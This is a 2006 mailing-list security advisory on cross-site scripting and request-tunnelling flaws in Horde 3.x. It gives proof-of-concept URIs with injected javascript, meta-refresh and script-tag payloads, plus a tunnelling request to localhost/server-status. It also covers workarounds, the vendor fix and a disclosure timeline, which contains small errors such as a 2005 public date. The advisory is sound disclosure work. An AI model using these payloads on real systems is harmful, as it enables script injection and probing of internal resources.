The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Horde Multiple XSS
------------------------------------------------------------------------
SUMMARY
"The <http://www.horde.org/> Horde Project is about creating high quality
Open Source applications, based on PHP and the Horde Framework."
Improper handling of user input allows attackers to execute XSS using
Horde.
DETAILS
Vulnerable Systems:
* Horde version 3.0.0 and above
* Horde version 3.0.10 and prior
* Jorde version 3.1.0 and above
* Horde Version 3.1.1 and prior
Horde is subject to a client side script injection vulnerability in the
URL redirection (dereferrer) function.
By accessing the following (partial) URI on a web site running an affected
version with a web browser which is prone to this issue, client side
script code will be injected into the output generated by the application:
[Base_URI]/services/go.php?url=http://./;URL=javascript:alert(0);
Horde is subject to a client side script injection vulnerability in the
help function.
By accessing the following (partial) URI on a web site running a
vulnerable version with a web browser which is prone to this issue, client
side script code will be injected into the output generated by the
application:
[Base_URI]/services/help/?show=about&module=%3Cmeta%20http-equiv=%22refresh%22%20content=%220;URL=javascript:alert(0)%3B%22%3E
This problem is caused by insufficient validation of user supplied input.
All common modern browsers providing Javascript support are assumed to be
prone to this issue.
Horde is subject to a client side script injection vulnerability in the
problem reporting function.
By accessing the following (partial) URI on a web site running a
vulnerable version with a web browser which is prone to this issue, client
side script code will be injected into the output generated by the
application:
[Base_URI]/services/problem.php?name=%22%3E%3Cscript%3Ealert(0)%3B%3C/script%20x=%22
This problem is caused by insufficient validation of user supplied input.
All common modern browsers providing Javascript support are assumed to be
prone to this issue.
Horde is subject to a server side issue which allows to tunnel HTTP GET
requests through the application and to inject remotely hosted web script
into the output generated by the application.
This behavior allows for accessing arbitrary locations which are
addressable using URIs starting with 'http://','https://' or 'ftp://'
protocol handlers. These locations will be accessible from within the
security context of the web server running an affected version of the
application. As a result, an attacker may be able to access remote
locations s/he would not have otherwise access to, without disclosing the
real source of the request [1]. Additionally, insufficiently access
restricted local (server-side) or remote (3rd party) locations may become
available [2].
By tricking a victim into starting a tunnelling call to a previously
prepared malicious HTML file, stored in a remote location, which contains
web script which may be executed on the client side, it is possible to
extend this into a script injection issue. The injected script would be
executed by the client within the context of the domain the vulnerable web
application is hosted in. [3] All common modern browsers providing
Javascript support are assumed to be prone to this issue.
Proof of Concept:
By accessing the following (partial) URIs on a web site running a
vulnerable version with a web browser, the behaviours described above may
be triggered:
[1]
[Base_URI]/horde/services/go.php?untrusted=1&url=http://moritz-naumann.com/
[2]
[Base_URI]/horde/services/go.php?untrusted=1&url=http://localhost/server-status
[3]
[Base_URI]/horde/services/go.php?untrusted=1&url=http://moritz-naumann.com/logger/xss.html
Workaround:
Issues 1-3:
Client: Disable Javascript.
Server: Prevent access to vulnerable file(s).
Issues 1-3:
Client: Use application as intended only.
Server: Prevent access to vulnerable file(s).
Vendor Status:
The Horde project has released versions 3.1.2 and 3.1.11 .
These are supposed to fix all of the above issues. The updated packages
are available at <http://horde.org/> http://horde.org/
Disclosure Timeline:
Jun 06, 2006 Issues 1-4: Discovery, code maintainer notification
Jun 06, 2006 Issues 1-4: Code maintainer acknowledgement
Jul 05, 2006 Issues 1-4: Code maintainer provides fix publicly
Jul 05, 2005 Issues 1-4: Public advisory
ADDITIONAL INFORMATION
The information has been provided by <mailto:security@moritz-naumann.com>
moritz-naumann.
The original article can be found at:
<http://moritz-naumann.com/adv/0011/hordemulti/0011.txt>
http://moritz-naumann.com/adv/0011/hordemulti/0011.txt
The vendor response can be found at:
<http://lists.horde.org/archives/announce/2006/000288.html>
http://lists.horde.org/archives/announce/2006/000288.html,
<http://lists.horde.org/archives/announce/2006/000287.html>
http://lists.horde.org/archives/announce/2006/000287.html
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
